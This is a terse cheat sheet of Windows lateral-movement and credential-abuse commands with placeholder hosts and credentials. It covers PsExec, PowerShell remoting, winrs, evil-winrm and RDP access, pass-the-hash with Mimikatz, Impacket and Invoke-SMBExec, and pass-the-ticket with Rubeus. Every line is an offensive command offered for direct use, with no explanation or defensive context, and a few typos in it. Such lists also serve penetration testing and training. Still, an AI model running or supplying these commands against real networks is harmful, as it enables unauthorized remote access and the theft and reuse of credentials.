.\\PsExec.exe \\\\<HOSTNAME> cmd
1- $sess = New-PSSession -ComputerName <HOST>
2- Enter-PSSession -Session $sess
1- $sess = New-PSSession -ComputerName <HOST>
2- Invoke-Command -Session $Sess -ScriptBlock {ipconfig;whoami;pwd}
Invoke-WSManWinRM -hostname <HOST> -command cmd
winrs -r:<HOST> -u:<Domain>/<USER> -p:<PASS> cmd
.\\PsExec.exe -u <Domain>/<USER> -p <PASS> \\\\<HOSTNAME> cmd
impacket-psexec <<Domain>/<USER>:<PASS>@<IP>>
#WSManWinRM
Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\\<USER> -password <PASS>
evil-winrm -i <IP> -u <Domain>/<USER>' -p <PASS>
#RDP Access
rdesktop -a 16 <IP> -u <DOMAIN\\USER> -p <PASS>
xfreerdp /v:IP /u:"<USER>" /p:<PASS>
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<> /ntlm:<NTLM> /run:powershell.exe"'
impacket-psexec -hashes ":<NTLM>" <USER>@<IP>
evil-winrm -u <username> -H <Hash> -i <IP>
pth-winexe -U <Domain>/<User>%<NT:LM> //<IP> cmd
#Impacket For Win
.\\psexec_windows.exe -hashes ":<NTLM>" <USER>@<IP>
#Invoke-TheHash
Invoke-SMBExec -Target <PC.Full.Domain> -Domain <Full.Doamin> -Username <> -Hash <NTLM> -Command '<Inj SHELL>' -verbose
Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt
.\\PsExec.exe -accepteula \\\\<HOST> cmd
winrs -r:<HOST> cmd
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<aes256key> /run:cmd.exe"'
1- impacket-getTGT <domain.full>/<USER> -hashes ":<NTLM>"
2- export KRB5CCNAME=$(pwd)/<USER>.ccache
3- impacket-psexec <domain.full>/<USER>@<IP> -k -no-pass
Invoke-Mimikatz -Command '"kerberos::ptt <C:\\Path\\To\\Ticket>"'
Rubeus.exe ptt /tikcet:<base64 Ticket>
#access
.\\PsExec.exe -accepteula \\\\<HOST> cmd
winrs -r:<HOST> cmd